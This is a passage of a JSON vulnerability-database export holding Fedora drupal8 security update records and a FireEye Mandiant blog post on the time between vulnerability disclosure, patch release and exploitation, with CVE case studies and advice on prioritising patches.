"Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-08T01:19:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.15-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-10909", "CVE-2019-10910", "CVE-2019-10911", "CVE-2019-11358"], "modified": "2019-05-08T01:19:07", "id": "FEDORA:3F234602D69C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T03:28:25", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal8-8.3.9-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6920", "CVE-2017-6921", "CVE-2017-6922", "CVE-2017-6923", "CVE-2017-6924", "CVE-2017-6925", "CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-24T03:28:25", "id": "FEDORA:C2CB46042D4E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. 
In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\nFigure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. 
The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. 
The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. 
Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious 
actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. 
In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}